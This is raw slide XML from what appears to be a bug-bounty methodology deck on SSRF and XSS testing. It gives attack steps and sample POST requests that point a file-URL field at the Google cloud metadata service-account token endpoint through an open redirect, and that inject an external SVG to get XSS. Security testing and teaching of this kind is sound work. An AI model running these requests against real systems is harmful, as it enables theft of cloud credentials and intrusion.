          <p:cNvPr id="894" name="Google Shape;894;p9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8350" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="898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p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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900" name="Google Shape;900;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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1" name="Google Shape;901;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interaction With Remote URL III </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="902" name="Google Shape;902;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="903" name="Google Shape;903;p93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="1389075"/>
            <a:ext cx="4973700" cy="3357900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to produce :-</a:t>
            </a:r>
            <a:endParaRPr b="1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1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Set Your Domain e.g. http://me.com As </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      Remote URL And Run Wireshark On It</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is Range OR Content-Range Header</a:t>
            </a:r>
            <a:endParaRPr b="1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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Response With e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2M AND</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      Upload File Less Than Bytes 2M On http://me.com</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Company Will Rerequest The Rest Of Bytes 2M</a:t>
            </a:r>
            <a:endParaRPr b="1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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Try To Redirect Second Request To e.g.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904" name="Google Shape;904;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="905" name="Google Shape;905;p9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8350" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="909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p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If There Is SSRF Try To Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brutelogic.com.br/poc.svg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Google Shape;911;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brutelogic.com.br/poc.svg</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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913" name="Google Shape;913;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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4" name="Google Shape;914;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Google Shape;915;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="Google Shape;916;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="917" name="Google Shape;917;p9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8350" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="Google Shape;918;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="919" name="Google Shape;919;p9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2925" y="3073200"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="923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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If You Can Embedded Videos From Services e.g. Vimeo , Youtube , Twitter , AND Facebook , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Their Title AND Description </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XSS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="925" name="Google Shape;925;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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926" name="Google Shape;926;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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7" name="Google Shape;927;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="928" name="Google Shape;928;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Google Shape;929;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="930" name="Google Shape;930;p9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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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1" name="Google Shape;931;p9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36000" y="2675525"/>
            <a:ext cx="4973700" cy="207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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="935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p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Redirection To Bypass The Blacklist e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com/redirect?url=</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract Google Metadata</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Google Shape;937;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com/redirect?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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939" name="Google Shape;939;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0" name="Google Shape;940;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942" name="Google Shape;942;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="943" name="Google Shape;943;p9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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944" name="Google Shape;944;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="945" name="Google Shape;945;p9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2925" y="3082775"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Google Shape;946;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="947" name="Google Shape;947;p9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64025" y="3525200"/>
            <a:ext cx="421000" cy="36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8" name="Google Shape;948;p9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64025" y="3939925"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Google Shape;949;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
